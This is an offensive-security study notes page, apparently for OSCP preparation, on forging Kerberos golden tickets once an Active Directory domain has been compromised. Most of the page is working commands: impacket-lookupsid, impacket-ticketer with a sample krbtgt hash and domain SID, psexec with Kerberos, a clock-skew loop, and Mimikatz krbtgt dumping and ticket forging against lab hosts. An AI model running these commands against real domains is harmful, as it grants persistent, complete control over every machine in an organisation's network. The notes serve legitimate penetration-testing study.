// notes/ Active Directory
🏛️
Post Domain Compromise Golden Ticket Attack
When we compromise the krbtgt account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain.
#active directory#adot8
source · oscp.adot8.com · active-directory/post-domain-compromise_golden-ticket-attack ↗Golden Ticket Attack
Overview
When we compromise the krbtgt account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain.
We can use Mimikatz on the Domain Controller to pull this attack off
Golden Ticket Attack via Ticketer
First get domain sid (inside of DC shell)
code
01impacket-lookupsid pnpt.local/adot:'texas'@192.168.1.10 impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
bash
$impacket-ticketer -nthash '819af826bb148e603acb0f33d17632f8' -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local Administratorbash
$export KRB5CCNAME=Administrator.ccacheAdd the domain, hostnames etc to /etc/hosts file
<figure><img src="/files/AJT2QhpXsvAgmYa15BT9" alt=""><figcaption></figcaption></figure>bash
$impacket-psexec htb.local/administrator@forest -k -no-pass{% hint style="info" %} You might have to change time for Kerberos to accept it {% endhint %}
<figure><img src="/files/qi96UyfpTUZxeYF7WCvN" alt=""><figcaption><p>From nmap scan</p></figcaption></figure> <figure><img src="/files/pjvhExo3udeuCKAIhHur" alt=""><figcaption></figcaption></figure> <pre class="language-bash"><code class="lang-bash"><strong>sudo for i in $(seq 00 24); do sudo date -s $i:36:00; impacket-psexec htb.local/threebigguys@10.10.10.161 -k -no-pass; done </strong></code></pre>bash
$sudo date -s 21:36:00 Golden Ticket Attack via Mimikatz
In the Domain Controller shell
powerquery
01mimikatz.exe02privilege::debug 03sekurlsa::lsa /inject /name:krbtgtpowerquery
01kerberos::golden /user:Administrator /domain:PNPT.local /sid:5-1-5-21--XXX /krbtgt:11f843XXX /id:500 /pttcode
01misc::cmd 02psexec \\DESKTOP-ILG11 cmd.exe